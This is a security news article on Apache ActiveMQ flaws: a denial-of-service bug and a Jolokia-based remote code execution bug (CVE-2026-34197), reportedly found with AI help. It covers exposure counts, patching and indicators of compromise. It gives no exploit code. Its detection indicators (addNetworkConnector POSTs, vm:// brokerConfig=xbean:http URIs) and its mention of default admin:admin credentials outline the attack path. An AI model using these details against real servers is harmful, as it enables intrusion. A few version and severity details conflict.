ActiveMQ Flaw Opens Door to Denial-of-Service Attacks

What Happened

A medium-severity flaw has been discovered in Apache ActiveMQ, a popular messaging service used by many organizations. This vulnerability, identified as CVE-2025-66168, allows authenticated attackers to send malformed packets that can crash the system, leading to a Denial-of-Service (DoS) attack. Security researcher Gai Tanaka first uncovered this issue, which was later confirmed by Apache maintainers on their mailing list.

In addition to this flaw, a critical remote code execution (RCE) vulnerability, tracked as CVE-2026-34197, has also been disclosed in Apache ActiveMQ Classic. This vulnerability, which has been present in the codebase for 13 years, was discovered by Horizon3.ai's Naveen Sunkavally using the AI model Claude. It allows authenticated attackers to exploit an improper input validation issue in ActiveMQ's Jolokia JMX-HTTP bridge, potentially enabling them to execute arbitrary OS commands.

Recent findings from nonprofit security organization Shadowserver revealed that over 6,476 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting this high-severity code injection vulnerability. Specifically, Shadowserver reported that as of April 22, 2026, 6,476 IP addresses were identified as vulnerable based on version checks. The majority of these vulnerable servers are located in Asia (approximately 3,000), North America (1,409), and Europe (1,334).

Despite the critical nature of CVE-2026-34197, alarming statistics show that nearly 6,500 instances remain unpatched weeks after its discovery. IT analyst Rob Enderle highlighted the urgency of the situation, stating that taking 12 days to patch is essentially a suicide note for networks, especially in a landscape where attackers can weaponize vulnerabilities almost instantaneously using AI tools.

CISA has recently added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog, indicating that the vulnerability is actively being exploited in the wild. The agency has mandated that federal agencies patch this vulnerability by April 30, 2026, under Binding Operational Directive 22-01. This directive emphasizes the urgency of addressing known vulnerabilities that pose significant risks to federal networks.

The RCE vulnerability has been assigned a high severity score of 8.8 and affects versions of Apache ActiveMQ/Broker prior to 5.19.4, and all versions from 6.0.0 up to 6.2.3. Sunkavally noted that the vulnerability was missed for many years due to the complex interactions between independently developed components, which included Jolokia, JMX, network connectors, and VM transports. These components function correctly in isolation but pose risks when combined, highlighting the efficacy of AI in identifying such vulnerabilities.

Interestingly, the process of uncovering this flaw was significantly accelerated by AI. Sunkavally described that what would have taken him a week to analyze manually took Claude just 10 minutes. The AI's ability to stitch together complex vulnerabilities that had remained undetected for years showcases the potential of AI in vulnerability research.

Importantly, while the RCE vulnerability typically requires credentials, many environments still use default username and password combinations (e.g., admin:admin). Furthermore, in versions 6.0.0 to 6.1.1, the vulnerability can be exploited without any credentials due to another vulnerability, CVE-2024-32114, which inadvertently exposes the Jolokia API without authentication. This allows attackers to invoke management operations through the API, leading to potential remote code execution.

Current Exploitation Trends

Recent telemetry data from Fortinet FortiGuard Labs has revealed dozens of exploitation attempts targeting the Jolokia management endpoints in Apache ActiveMQ Classic deployments, with activity peaking on April 14, 2026. This highlights the alarming speed at which attackers are exploiting newly disclosed vulnerabilities, often breaching systems before patches can be applied.

Shadowserver has begun daily internet scans for CVE-2026-34197 and has published a public dashboard to track the number of exposed ActiveMQ systems. Security teams are urged to identify vulnerable instances, verify installed versions, and restrict internet access where possible. Given ActiveMQ’s role in enterprise messaging and data pipelines, exposed management interfaces present a high-impact risk, potentially enabling data exfiltration, service disruption, or lateral movement.

Security Advisory

On April 8, 2026, the Apache Software Foundation published a security advisory (AV26-330) to address these vulnerabilities, particularly CVE-2026-34197. Users and administrators are urged to review the advisory and apply the necessary updates to mitigate risks associated with the vulnerabilities. The advisory specifically mentions that affected versions include Apache ActiveMQ Broker prior to 5.19.4 and versions 6.0.0 prior to 6.2.3.

Why Should You Care

If you use ActiveMQ in your organization, these vulnerabilities could directly impact your operations. A successful attack could disrupt your services, leading to downtime and potentially lost revenue. Think of it like having a key to your house but leaving the door wide open; just because someone has access doesn’t mean they should be able to cause damage.

The key takeaway here is that even authenticated users can pose a risk if vulnerabilities exist in the systems they access. It’s essential to stay informed and proactive about security to protect your data and services.

What's Being Done

In response to these vulnerabilities, the Apache team is actively working on patches to fix the issues. CVE-2026-34197 has already been patched in ActiveMQ Classic versions 5.19.5 and 6.2.3. Users are advised to update their deployments as soon as possible. Here’s what you should do if you’re using ActiveMQ:

• Monitor for updates from Apache regarding the patch release.
• Review your ActiveMQ configurations to ensure they are secure.
• Limit access to ActiveMQ services to trusted users only.
• For organizations running ActiveMQ versions 6.0.0 through 6.1.1, immediate action is required due to the unauthenticated RCE path that has been identified.

Experts are closely watching the situation for any signs of exploitation. Organizations concerned they may have been compromised via the RCE bug should look in their ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http. Other indicators of compromise include:

• POST requests to /api/jolokia/ containing addNetworkConnector in the request body.
• Outbound HTTP requests from the ActiveMQ broker process to unexpected hosts.
• Unexpected child processes spawned by the ActiveMQ Java process.

It’s crucial to remain vigilant and prepared as more information becomes available.